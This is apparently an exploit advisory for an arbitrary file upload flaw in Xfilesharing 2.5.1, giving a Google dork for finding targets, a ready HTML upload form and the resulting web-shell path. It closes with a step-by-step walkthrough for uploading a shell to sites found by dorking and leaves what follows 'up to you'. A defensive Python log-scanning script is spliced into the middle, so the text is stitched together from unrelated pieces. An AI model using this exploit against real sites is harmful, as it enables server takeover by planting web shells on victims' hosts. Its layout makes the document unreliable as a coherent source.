# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952
#####################
Arbitrary File Upload
#####################
<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>
Shell : http://xyz.com/cgi-bin/temp/joe/shell.php
Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman
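
For defenders reviewing web server logs, the following added example (not part of the original advisory or the vendor's code) flags requests for script files under the cgi-bin/temp/ directory named above and raises the severity when the same client previously POSTed to up.cgi. The combined log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
UPLOAD_PATH = "/cgi-bin/up.cgi"   # upload endpoint named in the advisory
TEMP_PREFIX = "/cgi-bin/temp/"    # directory where the advisory says files land
# Assumed list of extensions a server might hand to an interpreter.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".pl", ".cgi", ".py", ".sh")


def find_suspicious(lines):
    """Return one finding per request for a script file under the temp dir."""
    uploaders = set()  # client IPs seen POSTing to the upload endpoint
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        ip, ts, method, target, status = m.groups()
        # Drop the query string, decode %xx escapes, compare case-insensitively.
        path = unquote(urlsplit(target).path).lower()
        if method == "POST" and path == UPLOAD_PATH:
            uploaders.add(ip)
        elif path.startswith(TEMP_PREFIX) and path.endswith(SCRIPT_EXT):
            served = status == "200"
            findings.append({
                "ip": ip, "time": ts, "path": path, "status": int(status),
                # high: this client uploaded earlier and the script path was served
                "severity": "high" if ip in uploaders and served else "medium",
            })
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Nov/2019:10:00:01 +0000] "GET /?op=registration HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Nov/2019:10:00:09 +0000] "POST /cgi-bin/up.cgi HTTP/1.1" 200 0',
    '203.0.113.7 - - [04/Nov/2019:10:00:15 +0000] "GET /cgi-bin/temp/joe/shell.php HTTP/1.1" 200 312',
    '198.51.100.4 - - [04/Nov/2019:10:02:00 +0000] "GET /cgi-bin/temp/abc/photo.jpg HTTP/1.1" 200 9000',
    '198.51.100.9 - - [04/Nov/2019:10:03:00 +0000] "GET /cgi-bin/temp/x/a.PHP?c=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["time"], f["path"], f["status"])
```

A finding with status 200 only shows that the server answered for a script path under the temp directory; whether the file was executed depends on the handler configuration for that directory.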
[#] Dork and CSRF here:
https://pastebin.com/raw/xjv5kK5V
1. Dork first; once you have found a target, apply the exploit, for example:
http://localhost/?op=registration
Change it to http://localhost/cgi-bin/up.cgi
So ?op=registration is changed to cgi-bin/up.cgi
Vulnerable? Blank
2. Save the CSRF form in HTML format
Copy the vulnerable target, paste it into the CSRF form, then save
(By the way, for those who don't want the hassle, you can use an online CSRF tool; the file field type is "file", and the directory path will then be http://localhost/cgi-bin/temp/shell.php)
3. Change the text to whatever text you want
Then upload the shell
4. Once uploaded, the file will be located at
http://localhost/cgi-bin/temp/"your text"/shell.php
Example, as in the image below:
http://localhost/cgi-bin/temp/maxxct/1han.php
5. After that, it is up to you what you do with the site
OK, that's all for now...
Reference: